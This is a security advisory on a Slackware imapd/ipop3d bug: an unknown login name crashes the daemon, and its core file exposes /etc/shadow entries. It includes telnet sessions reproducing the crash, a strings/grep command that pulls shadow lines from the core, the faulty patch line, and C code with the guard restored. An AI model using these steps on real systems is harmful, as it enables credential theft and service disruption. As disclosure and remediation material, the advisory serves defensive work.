COMMAND

    imapd/ipop3d

SYSTEMS AFFECTED

    Slackware 3.3 (only imapd) and 3.4

PROBLEM

    Peter van Dijk found the following bug in the imapd/ipop3d that come
    with Slackware 3.4 (if you install the pine package).  Earlier
    Slackware versions will probably NOT suffer from this bug.  When fed
    an unknown username, imapd and ipop3d will dump core:

        [root@koek] /# telnet host 110
        Trying 10.10.13.1...
        Connected to host.com
        Escape character is '^]'.
        +OK some host POP3 3.3(20) w/IMAP2 client (Comments to MRC@CAC.Washington.EDU) at Sun, 1 Feb 1998 23:45:06 +0100 (CET)
        user root
        +OK User name accepted, password please
        pass linux
        [this is not the correct password]
        -ERR Bad login
        user john
        [no user named john]
        +OK User name accepted, password please
        pass doe
        Connection closed by foreign host.

    At this point ipop3d coredumps in /core:

        [root@zopie] /# strings core | grep -A3 root
        root
        [crypted pw here]

        10244
        Sun Feb  1 23:45:15 1998
        --
        root:[crypted pw here]:10244:0:::::
        halt:*:9797:0:::::
        operator:*:9797:0:::::
        shutdown:*:9797:0:::::
        [looks like /etc/shadow]
        --
        root:[crypted pw here]:10244:0:::::
        john
        host.com
        PASS

    Same goes for imapd:

        Connected to host.com
        * OK zopie.attic.vuurwerk.nl IMAP2bis Service 7.8(100) at Sun, 1 Feb 1998 23:53:00 +0100 (CET)
        A001 LOGIN root linux
        A001 NO Bad LOGIN user name and/or password
        A002 LOGIN john doe
        Connection closed by foreign host.

    Doing the strings/grep again gives about the same result.  Running
    this under  strace shows  that the  program reads  /etc/passwd and
    closes  it  again,  then  reopens  it  (to  try  the  username  in
    lowercase) and reads again, followed by a SIGSEGV.  The bug is  in
    (one  of)  the  patches  and  diffs  that  are  applied to support
    shadowing in Linux.  The problem is in log_lnx.c.diff.gz:

        -  if (!(pw && pw->pw_uid)) return NIL;
        +/*  if (!(pw && pw->pw_uid)) return NIL; */
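    Review bot: commenting out `if (!(pw && pw->pw_uid)) return NIL;`
    removes the only guard against pw being NULL, which is what the
    passwd lookup returns for an unknown login name; the SIGSEGV seen
    under strace right after the second /etc/passwd read is consistent
    with pw being used unchecked afterwards, and the resulting core file
    carries whatever the process had read (the shadow entries in the
    strings output above).  Whatever the shadow patch needed to relax,
    it should keep at least `if (!pw) return NIL;` so an unknown user is
    refused instead of crashing the daemon.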

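    As an added illustration (not the imapd/ipop3d source and not
    Slackware's patch), here is a login-name lookup with that guard
    restored, run over a constructed in-memory stand-in for /etc/passwd
    so it works stand-alone; checkname() and lookup() are names chosen
    here, not the server's:

```c
/* Added example, not imapd/ipop3d code: user lookup with the guard
 * "if (!(pw && pw->pw_uid)) return NIL;" kept in place. */
#include <ctype.h>
#include <stddef.h>
#include <string.h>
#include <sys/types.h>

struct pwent { const char *name; uid_t uid; };

/* Constructed stand-in for /etc/passwd; not any real system's table. */
static const struct pwent table[] = {
    { "root", 0 }, { "john", 1000 }, { "alice", 1001 },
};
#define NTABLE (sizeof table / sizeof table[0])

/* Behaves like getpwnam(): returns NULL for an unknown name. */
static const struct pwent *lookup(const char *name)
{
    for (size_t i = 0; i < NTABLE; i++)
        if (strcmp(table[i].name, name) == 0) return &table[i];
    return NULL;
}

/* Returns the uid of an acceptable login name, or -1 to refuse it.
 * Like the server, the name is retried in lowercase when the first
 * lookup fails; then the guard is applied before pw is dereferenced. */
int checkname(const char *user)
{
    char lower[64];
    const struct pwent *pw = lookup(user);
    if (!pw) {
        size_t n = strlen(user);
        if (n >= sizeof lower) return -1;
        for (size_t i = 0; i <= n; i++)        /* copies the NUL too */
            lower[i] = (char)tolower((unsigned char)user[i]);
        pw = lookup(lower);
    }
    /* The guard the patch commented out: an unknown user (pw == NULL)
     * and uid 0 are both refused.  Without it, pw->uid below would
     * dereference NULL for an unknown name and dump core. */
    if (!(pw && pw->uid)) return -1;
    return (int)pw->uid;
}
```

    Feeding it "john", "JOHN", "root" and an unknown name shows the
    lowercase retry succeeding and the other two being refused rather
    than crashing.
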
    Note that the dumped core is mode 600, _unless_ /core already
    exists, in which case its permissions are retained.  Apparently,
    the stock ipop3d is not vulnerable, but imapd is.

SOLUTION

    According to  Patrick Volkerding  [maintainer of  Slackware] he'll
    take the patch out and put a repaired package on the ftp site.